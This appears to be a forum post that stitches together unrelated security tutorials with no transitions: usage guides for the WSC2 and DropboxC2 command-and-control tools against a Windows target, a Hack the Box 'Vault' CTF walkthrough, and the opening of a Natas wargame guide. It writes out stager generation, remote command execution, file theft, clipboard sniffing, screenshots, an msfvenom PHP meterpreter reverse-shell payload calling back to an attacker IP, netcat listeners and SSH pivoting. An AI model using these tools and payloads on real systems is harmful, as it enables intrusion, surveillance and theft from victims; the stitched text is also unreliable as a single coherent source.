05-14-2020, 12:02 PM
| 0 | 0 | ||
Table of Content:
- Introduction
- Installation
- Exploiting Target
- Command Execution
- File Download
WSC2 is primarily a tool for post-exploitation. WSC2 uses the WebSocket and a browser process. This serves as a C2 communication channel between an agent, running on the target system, and a controller acting as the actual C2 server. This tool is developed using python. The credit for developing this tool goes to
[To see content please register here]
.For this particular demonstration,
Attacker: Kali Linux
Target: Windows 10
Installation
To begin, first we need the tool on our Attacker Machine. To do this, we will clone the tool directly from the GitHub.
git clone //github.com/Arno0x/WSC2.git
1
git clone //github.com/Arno0x/WSC2.git
![[Image: 1.png?w=687]](https://i0.wp.com/1.bp.blogspot.com/-msKvxO8Zo8s/XLLPni9rrPI/AAAAAAAAd_c/89v7lk2mnYURaPv_E71rVtxcskzLWbsnQCLcBGAs/s1600/1.png?w=687)
After running the above command, we would have a directory created by the name of WSC2. Now, we will traverse inside that directory using the cd command. Let’s see the contents of the directory that we just cloned using the ls command.
cd WSC2/
ls
1
2
cd WSC2/
ls
![[Image: 2.png?w=687]](https://i2.wp.com/1.bp.blogspot.com/-1kUgW4ani6Y/XLLPojDqbWI/AAAAAAAAd_s/GlIBX0Gm0a0a1hW1zPT3xkE408W9Ja4ywCLcBGAs/s1600/2.png?w=687)
After that we are going to need to install the dependencies of the tool. There are multiple ways to do this, but here we are using pip command along with a requirements.txt file that we cloned from git earlier.
pip install -r requirements.txt
1
pip install -r requirements.txt
![[Image: 3.png?w=687]](https://i0.wp.com/4.bp.blogspot.com/-lcfJTvIKal0/XLLPotwEl0I/AAAAAAAAd_w/Jq0XaMIN6XMdKJru548GbznZRoVPhSgjACLcBGAs/s1600/3.png?w=687)
As we saw earlier that we have a config.py file inside the cloned directory. We have to make some changes inside this config.py file so as to get the session on our system. We used nano to edit the file. As shown in the figure, when we opened the config.py file using nano, we found a variable CALLBACK. It has an IP Address. We changed it to the IP Address of our Attacker Machine i.e Kali Linux.
nano config.py
1
nano config.py
![[Image: 4.png?w=687]](https://i1.wp.com/1.bp.blogspot.com/-qkkUMTtO8hw/XLLPpfJANCI/AAAAAAAAd_0/qmvERIIE3IcHRc_61jv2h_iINLs_DwbewCLcBGAs/s1600/4.png?w=687)
Exploiting Target
Now, it’s time to run the tool, check for appropriate permission before running the tool. As we run the tool, we are greeted with a cool looking banner as shown in the given below. Followed by some details about the Author and Version and tool. After this, it will create an incoming directory inside the Directory we cloned earlier. This will be used as a buffer to save files from the target.
./wsc2.py
1
./wsc2.py
![[Image: 5.png?w=687]](https://i2.wp.com/1.bp.blogspot.com/-eD3eW_bwuxw/XLLPpXl0G5I/AAAAAAAAd_4/3N8dTc0_CfojSKQVWpm__Wozp-9Z985yQCLcBGAs/s1600/5.png?w=687)
We are going to create a batch file. But we can use many other types of stager options. This tool provides stager in jscript1, jscript2, jscript3. We are using jscript1 here because it is not required to compile. Rest of the stagers are required to compile. This command will create a wsc2Agent1.js in stagers directory.
genStager jscript1
1
genStager jscript1
![[Image: 6.png?w=687]](https://i2.wp.com/1.bp.blogspot.com/-k825eeg2lvY/XLLPpl0a9dI/AAAAAAAAd_8/MJ-A9oEBkqogNam9upFeAvK-cCLybyOqgCLcBGAs/s1600/6.png?w=687)
Now let’s get the file to the target machine. To do this we will open up a new terminal and traverse into the stagers directory using the cd command. Here, we are using the python server to share the file to the target. This can be done using any other method of choice.
cd stagers/
ls
python -m SimpleHTTPServer 80
1
2
3
cd stagers/
ls
python -m SimpleHTTPServer 80
![[Image: 7.png?w=687]](https://i2.wp.com/1.bp.blogspot.com/-SjXy33E65Tc/XLLPqUZfyLI/AAAAAAAAeAA/XAxrxNleS2g1v3vFxRQWXVglZpBgJKW1ACLcBGAs/s1600/7.png?w=687)
After the jscript file is executed on the target machine, we will be informed with a message on the terminal that New agent connected. Now we will use the list command to see the list of the agents.
list
1
list
![[Image: 8.png?w=687]](https://i1.wp.com/4.bp.blogspot.com/-pHQvT8agSVM/XLLPqhw-TxI/AAAAAAAAeAI/nSfdEn0UoCMwIpAuw9pKMHQfqJMbAvINwCLcBGAs/s1600/8.png?w=687)
And then we will copy the AgentID and then use it to interact with the session as shown in the given image.
use [AgentID]
1
use [AgentID]
Command Execution
We can run some PowerShell commands on the target machine using the command cli. Here we run the command systeminfo. And we have the system information of the target as shown in the given image.
cli
systeminfo
1
2
cli
systeminfo
![[Image: 10.png?w=687]](https://i2.wp.com/1.bp.blogspot.com/-IuK_Drn8lrQ/XLLPniQGEXI/AAAAAAAAd_g/eUo_8z4pZq8gA6jx4G4j9EBA2tL7mh5cwCLcBGAs/s1600/10.png?w=687)
File Download
Furthermore, we can download files from the target. To do this we will have to use the command getFile followed by the file name or path. This will download the file form the target to our attacker machine.
help getFile
getFile sample_text.txt
1
2
help getFile
getFile sample_text.txt
![[Image: 11.png?w=687]](https://i2.wp.com/1.bp.blogspot.com/-uiFwbJBF_7k/XLLPnn0Yj6I/AAAAAAAAd_k/PAs6eXcyq2kXoIXTbVFP5GkRrCMO6O-EgCLcBGAs/s1600/11.png?w=687)
The tool will download the file inside the incoming directory we discussed earlier. We can view the file using cat command as shown in the image given below.
cd incoming/
ls
cat sample_file.txt
1
2
3
cd incoming/
ls
cat sample_file.txt
![[Image: 12.png?w=687]](https://i2.wp.com/3.bp.blogspot.com/-wH97PCLxEQQ/XLLPolQTbrI/AAAAAAAAd_o/2a49Kh0ajn0BBALaNcGy2PMpITMzb7KKwCLcBGAs/s1600/12.png?w=687)
Today we are going to solve another CTF challenge “Vault”. It is a retired vulnerable lab presented by Hack the Box for helping pentesters to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.
Level: Intermediate
Task: To find user.txt and root.txt file
Note: Since these labs are online available, therefore, they have a static IP. The IP of Curling is 10.10.10.109
Penetrating Methodology
- Network scanning (Nmap)
- Surfing the IP address on the browser
- Surfing directories on the browser
- Using dirb for directory scanning
- Creating Payload using msfvenom
- Getting Meterpreter Session
- Enumerating through directories
- Getting SSH login credentials
- Logging into SSH
- Pinging Host IP
- Scanning Ports on Host IP
- Dynamic Port forwarding with SSH
- Updating the VPN Configuration file
- Executing Netcat listener
- Finding user.txt
- Getting SSh Login Credentials
- Using the proxy command option
- Escaping restricted shell
- Using gpg to decrypt root.txt.gpg file
- Converting the file in the base64 string using python3m
- Using echo to decrypt the string
- Reading our Root Flag
Let’s start off with our basic Nmap command to find out the open ports and services.
nmap -p- -sV -sC 10.10.10.109
1
nmap -p- -sV -sC 10.10.10.109
![[Image: 1.png?w=687]](https://i1.wp.com/1.bp.blogspot.com/-1hBD2-Ae1kw/XLHoEv7_irI/AAAAAAAAd88/9svoJsoJIGch2mOb0OdSx_JiWcLAqrfPgCLcBGAs/s1600/1.png?w=687)
As port 80 is running HTTP service, we open the IP address in the web browser.
![[Image: 2.png?w=687]](https://i2.wp.com/2.bp.blogspot.com/-8zsScXbzE3Q/XLHoHHsLbMI/AAAAAAAAd9k/hkb_rvvEmC008G9qoNyYZM5eDaGm5jLQgCLcBGAs/s1600/2.png?w=687)
We thought of opening sparklays in the browser along with the Machines IP. But it turned out to be forbidden.
![[Image: 3.png?w=687]](https://i2.wp.com/4.bp.blogspot.com/-xEgcU8Qbvm4/XLHoKR7L1eI/AAAAAAAAd-Q/FHSBbPuy8t85GFV2CqatB-Tay7YUDNYSgCLcBGAs/s1600/3.png?w=687)
We don’t find anything on the web page, so we further enumerate the web service using dirb scan.
dirb //10.10.10.109/sparklays/ -w
1
dirb //10.10.10.109/sparklays/ -w
![[Image: 4.png?w=687]](https://i2.wp.com/4.bp.blogspot.com/-z5CEkFDCd58/XLHoLHQ2PcI/AAAAAAAAd-c/5PYbFGbNQd0EPJ6PJRz9YnlIwxwj_XSiACLcBGAs/s1600/4.png?w=687)
From dirb scan, we found a useful directory /design/design.html which we opened in the browser. Since the only thing left to do on this Page is to click on Change Logo.
![[Image: 5.png?w=687]](https://i0.wp.com/3.bp.blogspot.com/-vKL2YNDBO0Q/XLHoLhPQdkI/AAAAAAAAd-g/XLauWyb-3GgXW738mABUuNy0mFbS1YI2ACLcBGAs/s1600/5.png?w=687)
It redirected us on a File Upload Page.
![[Image: 6.png?w=687]](https://i0.wp.com/1.bp.blogspot.com/-fxnRgeVzx88/XLHoMMnlBGI/AAAAAAAAd-k/7jtBGHcpEqs1f0A0N6kSGysctnio9A29gCLcBGAs/s1600/6.png?w=687)
Now we have used msfvenom to generate malicious PHP file.
msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.13.234 lport=1234 -f raw > shell.php5
1
msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.13.234 lport=1234 -f raw > shell.php5
![[Image: 7.png?w=687]](https://i0.wp.com/1.bp.blogspot.com/-qTXObCWiEp4/XLHoMhWYK-I/AAAAAAAAd-o/rafj912n8ykvPQVsfhxz73B6wa-qQEPcgCLcBGAs/s1600/7.png?w=687)
We have successfully uploaded the malicious file.
![[Image: 8.png?w=687]](https://i1.wp.com/1.bp.blogspot.com/--oEP708YPSQ/XLHoNJd5USI/AAAAAAAAd-s/QqloBZeeIvUbxwzD6N9YgEHU-3wcO49_ACLcBGAs/s1600/8.png?w=687)
On the other hand, we have setup listening using Metasploit-framework.
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost tun0
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > run
1
2
3
4
5
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost tun0
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > run
![[Image: 9.png?w=687]](https://i2.wp.com/1.bp.blogspot.com/-Fxpge_0cAt8/XLHoNaEX8pI/AAAAAAAAd-w/lzAhqKH4wSQZc892-R0RLRGA-kar4Hj8QCLcBGAs/s1600/9.png?w=687)
Let’s open our malicious file using the browser.
![[Image: 10.png?w=687]](https://i2.wp.com/1.bp.blogspot.com/-Sl2I9IJFCVk/XLHoEhi4NfI/AAAAAAAAd9E/6RMe3Xi0yjkiMZ13nDGzrLyCCQtd5GPXQCLcBGAs/s1600/10.png?w=687)
Finally, we have got the meterpreter.
sysinfo
1
sysinfo
![[Image: 11.png?w=687]](https://i1.wp.com/4.bp.blogspot.com/-5nEcnDHnW4Y/XLHoEiiTzgI/AAAAAAAAd9A/aa3buCkjifMZpadnys4LMihPsxQIKYBfwCLcBGAs/s1600/11.png?w=687)
While looking for our first flag, we have some useful credential for ssh login.
Username- dave
Password- Dav3therav3123
cd Desktop
ls -al
cat Servers
cat key
cat ssh
1
2
3
4
5
cd Desktop
ls -al
cat Servers
cat key
cat ssh
![[Image: 12.png?w=687]](https://i2.wp.com/1.bp.blogspot.com/-17q3EDAK0a4/XLHoFdYtv_I/AAAAAAAAd9I/ogZY5Oy0ji0RQaTvxVuFcqQ7L5b3KjDngCLcBGAs/s1600/12.png?w=687)
Time to login into ssh.
Username- dave
Password- Dav3therav3123
![[Image: 13.png?w=687]](https://i2.wp.com/4.bp.blogspot.com/-qKEqrnzfCVk/XLHoFpS4-jI/AAAAAAAAd9M/H5sKShlZLAw0NVzMCAimO7DjbSzOSzVYgCLcBGAs/s1600/13.png?w=687)
We use the ping command to find all the available machines on the subnet “192.168.122.1/255”.
for i in {1..255}; do ping -c 1 192.168.122.$i | grep 'from' ; done
1
for i in {1..255}; do ping -c 1 192.168.122.$i | grep 'from' ; done
![[Image: 14.png?w=687]](https://i0.wp.com/1.bp.blogspot.com/-Fl-ZusYOOUU/XLHoFwm-UxI/AAAAAAAAd9Q/gn-mk3uFSIUPe-iYv5d8z9TS1kqKXnb7ACLcBGAs/s1600/14.png?w=687)
Let’s use the following command to scan the ports of 192.168.122.4 to see what we are up against.
![[Image: 15.png?w=687]](https://i2.wp.com/4.bp.blogspot.com/-ZTR83Km9wiE/XLHoGOUnaoI/AAAAAAAAd9U/TWzvN6PuK68gdEsn_gl-YAqAGXsdu68GgCLcBGAs/s1600/15.png?w=687)
Now connect to the client machine using the command below.
ssh -D 8080 [email protected]
1
ssh -D 8080 [email protected]
Password- Dav3therav3123
![[Image: 16.png?w=687]](https://i0.wp.com/4.bp.blogspot.com/-FDP46T3Vv0Y/XLHoGQcqNWI/AAAAAAAAd9Y/IE689yOmwKUeZctopMDHCq1ShH6c-RBxwCLcBGAs/s1600/16.png?w=687)
The proxy on the browser is set up to point to socks5://127.0.0.1:8080.
Let’s open the IP 192.168.122.4 in the browser. And see where it directed us. Click on VPN Configuration link.
![[Image: 17.png?w=687]](https://i1.wp.com/2.bp.blogspot.com/-CPCUoLrqt4c/XLHoG3qT6hI/AAAAAAAAd9c/zjX9Swbbdc8yPef7jbol4n-21Qg2lgd_QCLcBGAs/s1600/17.png?w=687)
It directed us to the page where we need to update the VPN file. We have found the details in Test VPN link.
![[Image: 18.png?w=687]](https://i0.wp.com/4.bp.blogspot.com/-TWgoK544dQE/XLHoHIv7b-I/AAAAAAAAd9g/3wbfNE95st4V1du3Jaq7KqkGT8le8gA9QCLcBGAs/s1600/18.png?w=687)
Simply we have pasted and modified the details in which we have given the IP address of the Target Machine along with port 1234. Click on update file.
![[Image: 20.png?w=687]](https://i1.wp.com/4.bp.blogspot.com/-G-u_4IPF9xo/XLHoH0qERwI/AAAAAAAAd9s/pVhQr93CM5gIXO1XxZe2eUGd0rLqlMuJACLcBGAs/s1600/20.png?w=687)
On the other hand, we have executed listening on port 1234.
nc -lvp 1234
1
nc -lvp 1234
We have easily got the root access. Enumerating directories to find user.txt.
cd /root
ls
ls -al
1
2
3
cd /root
ls
ls -al
![[Image: 21.png?w=687]](https://i0.wp.com/2.bp.blogspot.com/-jG6X-5xOmmU/XLHoH5pMKeI/AAAAAAAAd9o/8XaT0Go5EogCZ-cUOYvhOnoRab_XydzQQCLcBGAs/s1600/21.png?w=687)
After some digging, we have found our first flag.
ls
cd dave
ls
cat user.txt
1
2
3
4
ls
cd dave
ls
cat user.txt
![[Image: 22.png?w=687]](https://i2.wp.com/3.bp.blogspot.com/-8mhvE6Hrdqs/XLHoH60mhFI/AAAAAAAAd9w/BfY-dsFy-7MSSFkMepX9Hwqsv5enUE6-wCLcBGAs/s1600/22.png?w=687)
Now we thought of reading the logs, we were totally out of hints. While looking at the logs we found something interesting. We saw that the firewall is accepting inbound traffic from port 4444/tcp to host 192.168.5.2 which is listening at 987/tcp.
So, to find out, what’s running on 987/tcp. Use the following command.
ncat -p 4444 192.168.5.2 987
1
ncat -p 4444 192.168.5.2 987
It came out be SSH service.
![[Image: 23.png?w=687]](https://i1.wp.com/3.bp.blogspot.com/-GSFhW09wJXc/XLHoIl6H8zI/AAAAAAAAd90/WG8jpeXLTq0tjXD4GkfRCx5LX_mJlZxUACLcBGAs/s1600/23.png?w=687)
We again found Credentials for SSH Login.
Username- dave
Password- dav3gerous567
cat ssh
1
cat ssh
![[Image: 24.png?w=687]](https://i2.wp.com/3.bp.blogspot.com/-w1Lk_A3_9Jo/XLHoI0A_3hI/AAAAAAAAd94/BVaUyq73ksc9DR5R--vsfxuAorJxYPJ8QCLcBGAs/s1600/24.png?w=687)
What are we waiting for, time to log into SSH, here we again found User.txt.
ssh [EMAIL=The contents of this section are hidden for your group]The contents of this section are hidden for your group[/EMAIL]
Register or Login
Password- dav3gerous567
ls
cat user.txt
1
2
ls
cat user.txt
![[Image: 25.png?w=687]](https://i2.wp.com/2.bp.blogspot.com/-LDQ3z2NxnTI/XLHoJDQqQ7I/AAAAAAAAd98/Hl_oPsuTi2w6DuRghv4tRaZ54TpI4VH5wCLcBGAs/s1600/25.png?w=687)
Since dave has a restricted default shell, so we are using proxy command to re-login.
ssh -o 'Proxycommand ncat -p 4444 %h %p' -p 987 [email protected]
1
ssh -o 'Proxycommand ncat -p 4444 %h %p' -p 987 [email protected]
![[Image: 26.png?w=687]](https://i2.wp.com/2.bp.blogspot.com/-SvoUppAj6rk/XLHoJYDE1hI/AAAAAAAAd-A/fCT8ApnzIuE082miG2VuwQFPodvkp1QdgCLcBGAs/s1600/26.png?w=687)
After logging in as user “monitor” we find that we have a restricted shell. We are not able to change the SHELL variable. After spawning a TTY shell, we are able to change the SHELL environment variables.
echo $SHELL
export SHELL=/bin/bash:$SHELL
python
bash
export SHELL=/bin/bash:$SHELL
1
2
3
4
5
echo $SHELL
export SHELL=/bin/bash:$SHELL
python
bash
export SHELL=/bin/bash:$SHELL
![[Image: 27.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-Rsq64tuA-iQ/XLIWh2XNGWI/AAAAAAAAd_Q/t19Q77GEDlwDni309aVY1yYdeNlbywYiwCLcBGAs/s1600/27.png?w=687&ssl=1)
We tried decrypting the file root.txt.png but couldn’t succeed. Since it requires a secret key.
gpg -d root.txt.gpg
1
gpg -d root.txt.gpg
![[Image: 28.png?w=687]](https://i0.wp.com/1.bp.blogspot.com/-bJcj5BVYo2A/XLHoKC-g34I/AAAAAAAAd-I/wFmDCzuhe5AhmpHbTj5ZDLPRYmBpG1NwgCLcBGAs/s1600/28.png?w=687)
There are not many options left, let’s convert into a base64 encoded string using python3m.
python3m -c "import base64;print(base64.b64encode(open('root.txt.gpg', 'rb').read()))"
1
python3m -c "import base64;print(base64.b64encode(open('root.txt.gpg', 'rb').read()))"
![[Image: 29.png?w=687]](https://i2.wp.com/4.bp.blogspot.com/-k3LzBBXymWE/XLHoKdHp5iI/AAAAAAAAd-M/mFhqhhnwII0jog1FT7eNGG8viMAYiSwFACLcBGAs/s1600/29.png?w=687)
We have copy & pasted the encoded string to the ubuntu machine and decrypted it. Since we have found the paraphrase ‘itscominghome’ we can easily open the file root.txt.gpg to read our final flag.
![[Image: 30.png?w=687]](https://i2.wp.com/2.bp.blogspot.com/-inB_fSoFHkE/XLHoK_l4LkI/AAAAAAAAd-U/1hj0djQZla4jafwvv5I0GQ-yQsMwDdGEwCLcBGAs/s1600/30.png?w=687)
Finally, we have read our Final Flag.
gpg -d root.txt.gpg
1
gpg -d root.txt.gpg
![[Image: 31.png?w=687]](https://i0.wp.com/4.bp.blogspot.com/-R1w5izsiypU/XLHoLAvLPNI/AAAAAAAAd-Y/XrHN6jNtqCU4A3j3VsV2y0Q2cVaFZspzACLcBGAs/s1600/31.png?w=687)
In this article, we will learn how to use DropboxC2 tool. It is also known as DBC2.
Table of Content:
- Introduction
- Installation
- Getting Dropbox API
- Exploiting Target
- Sniffing Clipboard
- Capturing Screenshot
- Command Execution
- File Download
DBC2 is primarily a tool for post-exploitation. It has an agent running on the target’s machine, a controller, running on any machine, PowerShell modules, and Dropbox servers as a means of communication. It is inspired by the PowerShell Empire Framework. This tool is developed using python. The credit for developing this tool goes to
[To see content please register here]
.For this particular demonstration,
Attacker: Kali Linux
Target: Windows 10
Installation
To begin, first, we need the tool on our Attacker Machine. To do this, we will clone the tool directly from the GitHub.
git clone
[To see content please register here]
1
git clone
[To see content please register here]
![[Image: 1.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-FIgdVauBSkw/XLACGTOg-gI/AAAAAAAAd7Y/O_DPgPes3CoaNNjZGnx6tSJkK9GWXQmWACLcBGAs/s1600/1.png?w=687&ssl=1)
After running the above command, we would have a directory created by the name of DBC2. Now, we will traverse inside that directory using the cd command. After that, we are going to need to install the dependencies of the tool. There are multiple ways to do this, but here we are using pip command along with a requirements.txt file that we cloned from git earlier.
cd DBC2/
pip install -r requirements.txt
1
2
cd DBC2/
pip install -r requirements.txt
![[Image: 2.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-PIH6Aenq_Bc/XLACJmm5K2I/AAAAAAAAd8A/17CpMV1bPBsyXVg-ieN4gWfo6yeld1TogCLcBGAs/s1600/2.png?w=687&ssl=1)
Getting Dropbox API
Now, this tool uses the Dropbox Servers as the medium to run agents on the target machine. In order to do that, this tool requires a Dropbox API. To get that, first, create an account on
[To see content please register here]
. Then after creating the account, head to developer tools[To see content please register here]
. A webpage will open similar to the one shown below. Here we will select the “Dropbox API”. Then in the type of access section, we will choose “App folder”. Name the app as per choice. Then click on Create App Button to proceed.![[Image: 3.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-aZfoZNb3aUk/XLACJ7r6vzI/AAAAAAAAd8E/VdAO51GHb_Q8l5qDRPadiWLVZsYAR80RwCLcBGAs/s1600/3.png?w=687&ssl=1)
This will lead to another webpage as shown below. Here, move on to the O Auth 2 Section, and
Generate access token. This will give the Dropbox API required for this particular practical.
![[Image: 4.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-y7LK_Mi0aU0/XLACKW2j0FI/AAAAAAAAd8I/LUV6gsAAnOkFKhOGWtkAqrahsmWYhwO9gCLcBGAs/s1600/4.png?w=687&ssl=1)
Copy the Generated access token, now get to the directory we cloned earlier. Here we have a file named config.py. We will open it using nano command and paste the Access token as the value for “defaultAccessToken” as shown in the given screenshot given below.
![[Image: 5.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-RRlsuqlRX9A/XLACKsn5XRI/AAAAAAAAd8M/KEtBT5C8wmA3ML2baOFAUfoY8D3t2bthQCLcBGAs/s1600/5.png?w=687&ssl=1)
Exploiting Target
Now, it’s time to run the tool, check for appropriate permission before running the tool. As we run the tool, we are greeted with a cool looking banner as shown in the given below. Followed by some details about the Author and Version and tool. After this, it will ask for a master password which will be used to encrypt all the data between the agents and the controller. Enter the password of choice. It will encrypt the password entered and display the result. We can copy the code shown and add to the config.py file so that it doesn’t ask again for a master password. After this, it will create an incoming directory inside the Directory we cloned earlier. This will be used as a buffer to save files from the target.
python dropboxC2.py
1
python dropboxC2.py
![[Image: 6.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-VYANON8MyZM/XLACK1GA8NI/AAAAAAAAd8Q/jEpl64Gfccwo5eKEwllyan19s6rLR7FqwCLcBGAs/s1600/6.png?w=687&ssl=1)
This tool requires to upload the modules and stager on Dropbox before proceeding further. We will do this using the command given below.
publishStage dbc2_agent.exe
1
publishStage dbc2_agent.exe
![[Image: 7.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-evdLTkaieL4/XLACLTCqkcI/AAAAAAAAd8Y/zqQyf_eFdW8Z8b2JtPY6dr6-IPgiPY8aQCLcBGAs/s1600/7.png?w=687&ssl=1)
This will upload a file on the Dropbox as shown in the image given below. This file is encrypted using XOR encryption.
![[Image: 8.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-SoG_dEenruA/XLACLRT8oFI/AAAAAAAAd8U/hOugxqtt8xU8SMTLZT2EqcjgWfZMiI5vACLcBGAs/s1600/8.png?w=687&ssl=1)
Now let’s check if the stage is published using the command given below:
listPublishedStage
1
listPublishedStage
![[Image: 9.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-BVo54jErhOs/XLACLxn-vVI/AAAAAAAAd8c/SLhn9oM2xjQ7_pZ7mGN5wRVC23KeFgSMwCLcBGAs/s1600/9.png?w=687&ssl=1)
Now that stage is uploaded, let’s use it to create a stager. We are going to create a batch file. But we can use many other types of stager options. This tool provides stager in macro, oneliner, JavaScript, MS build sct and much more. This command will create a stager.bat in the tmp directory. We sent this bat file to our target machine.
genStager batch default
1
genStager batch default
![[Image: 10.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-ZNPtwy0sCqc/XLACGQ47McI/AAAAAAAAd7c/Vgk_NNvTkIU6WmKr6p0hvfgpSnaomvLcQCLcBGAs/s1600/10.png?w=687&ssl=1)
After the batch file is executed on the target machine, we will be informed with a message on the terminal that Agent found with ID. Now we will use the list command to see the list of the agents. And then we will copy the AgentID and then use it to interact with the session as shown in the given image.
list
use [AgentID]
1
2
list
use [AgentID]
![[Image: 12.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-cviL_CC_jZc/XLACGFzfWAI/AAAAAAAAd7U/eN2rHNyJ9j4dIERnq_h-7Sm-Mx6WJO98ACLcBGAs/s1600/12.png?w=687&ssl=1)
This will create a file on the Dropbox with the .status extension as shown in the given image.
![[Image: 13.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-Npymm7Rko6c/XLACHfyHqpI/AAAAAAAAd7g/NUHdzXTNu5gILnDaehZarAy3XMabCXzSQCLcBGAs/s1600/13.png?w=687&ssl=1)
Clipboard Sniffing
We can get the clipboard data that the target has on its clipboard. That is., the data he/she has copied. To do this we will have to start a sniffer using the command clipboardLogger start. Then wait till the target copies some data. Then Stop the sniffer using the command clipboardLogger stop. After stopping the sniffer the clipboard will be saved in a text file inside the incoming directory.
clipboardLogger start
clipboardLogger stop
1
2
clipboardLogger start
clipboardLogger stop
![[Image: 14.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-j3z87SQvmss/XLACHh9awVI/AAAAAAAAd7k/plF8KVMiF6Y8W7KV9aGCwQrvCCYvRLLGwCLcBGAs/s1600/14.png?w=687&ssl=1)
Let’s take a look at what target copied on his/her machine. We are going to use the cat command on a new Kali terminal to read the file as shown in the given image.
cat /root/DBC2/incoming/clipboardlogger.txt
1
cat /root/DBC2/incoming/clipboardlogger.txt
![[Image: 15.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-08iK4R5DaSo/XLACH82DtRI/AAAAAAAAd7o/CfFenFtbj08fP-CuN6wWsVqM6ke8EbeDwCLcBGAs/s1600/15.png?w=687&ssl=1)
Capturing Screenshot
Now furthermore we can grab a screenshot of then target machine. To do this we will use the screenshot command as shown in the given image.
screenshot
1
screenshot
![[Image: 16.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-RcvpG05VYbU/XLACITKF_tI/AAAAAAAAd7s/cQX85JYIWkAz6Y2P3cThauxvJNE9NGgIwCLcBGAs/s1600/16.png?w=687&ssl=1)
The screenshot will be captured and stored in the incoming directory. We can see that the target is browsing a website on his/her machine in the given image.
![[Image: 17.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-3NkExnXgtNY/XLACIhRNs_I/AAAAAAAAd7w/f5bhzGbHWf0_V-g903UHIcRFQKCGnRK5wCLcBGAs/s1600/17.png?w=687&ssl=1)
Command Execution
We can run some PowerShell commands on the target machine using the parameter cmd. This tool doesn’t offer the shell but it can execute one command at a time. So, we type cmd and then it asks the command that is to be executed. Here we run the command dir. And we have the list of files as shown in the given image.
cmd
dir
1
2
cmd
dir
![[Image: 18.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-b7cQ4wTEZ9M/XLACIm1dLnI/AAAAAAAAd70/o9rvmtKfrLEyRM-Gjm1CR39zs8upIq8mACLcBGAs/s1600/18.png?w=687&ssl=1)
File Download
Furthermore, we can download files from the target. To do this we will have to use the command getFile followed by the file name or path. This will download the file form the target to our attacker machine.
getFile sharetext.txt
1
getFile sharetext.txt
![[Image: 19.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-zLCPTwMW6pk/XLACJPheOcI/AAAAAAAAd74/K9svm39lFqcHGfWjmMeeVWQwfy4YCas-wCLcBGAs/s1600/19.png?w=687&ssl=1)
The tool will download the file inside the incoming directory we discussed earlier. We can view the file using cat command as shown in the image given below.
cat /root/DBC2/incoming/sharetext.txt
1
cat /root/DBC2/incoming/sharetext.txt
![[Image: 20.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-IyHCZKZIAPU/XLACJd9C_II/AAAAAAAAd78/29MFieE7SUAxNVGw7eVXPkNKe0HVUo7VACLcBGAs/s1600/20.png?w=687&ssl=1)
Today, we will play a war-game called Natas. It has a collection of 34 levels. OverTheWire Organization hosts this war-game. Absolute Beginners are the target audience. It teaches the basics of serverside web-security in a fun and challenging way. To play this war-game, go to the Natas website by clicking
[To see content please register here]
.Objective
Find the password to login on to the next level.
Table of Content:
- Introduction
- Level 0
- Level 0 → Level 1
- Level 1 → Level 2
- Level 2 → Level 3
- Level 3 → Level 4
- Level 4 → Level 5
- Level 5 → Level 6
- Level 6 → Level 7
- Level 7 → Level 8
- Level 8 → Level 9
- Level 9 → Level 10
Natas have levels designed in such a way that each level has a different website. To reach each website we will enter the URL in this format.
natasX.natas.labs.overthewire.org, where X is the Level Number.
To access a level, we will use the username for that level (e.g. natas0 for level 0) and its password. The password for the next level is hidden on the current level. We will have to enumerate the password for the next level that is hidden in the current level. All the passwords are stored at /etc/natas_webpass/.
Level 0
This is a pretty simple level. We have the login credentials given on the Natas Introduction Page. Just browse the URL and enter the login credentials.
Username: natas0
Password: natas0
![[Image: 1.png?w=687]](https://i0.wp.com/2.bp.blogspot.com/-sJEhBSG5Y8I/XK4WsxC7KsI/AAAAAAAAd4Y/IZb9fgJVypYLslKmVSKpyzPmQxk5J4aDgCLcBGAs/s1600/1.png?w=687)
Level 0 → Level 1
On successfully logging in the natas0 webpage, we will have a message in front of us. It says “You can find the password for the next level on this page” as shown in the figure given below.
![[Image: 2.png?w=687]](https://i0.wp.com/3.bp.blogspot.com/-XqRmbCOhpMU/XK4WwQrKi6I/AAAAAAAAd68/8Y22PoYOiOc49gIC1bbRqzIb39oZhRtlQCEwYBhgL/s1600/2.png?w=687)
Now as per convention, let’s try to find something inside the source code. To view source code, we will right click on the webpage and select ‘View Page Source’. And there we have the password commented in the source code.
![[Image: 3.png?w=687]](https://i2.wp.com/2.bp.blogspot.com/-g6gZFdEBm9U/XK4W03YXoLI/AAAAAAAAd64/YPF52VcuzGIjnoSppJIxrzqp6_5XLfZJgCEwYBhgL/s1600/3.png?w=687)
Level 1 → Level 2
We use the credentials we extracted from the previous level to login into Level 1.
Username: natas1
Password: gtVrDuiDfck831PqWsLEZy5gyDz1clto
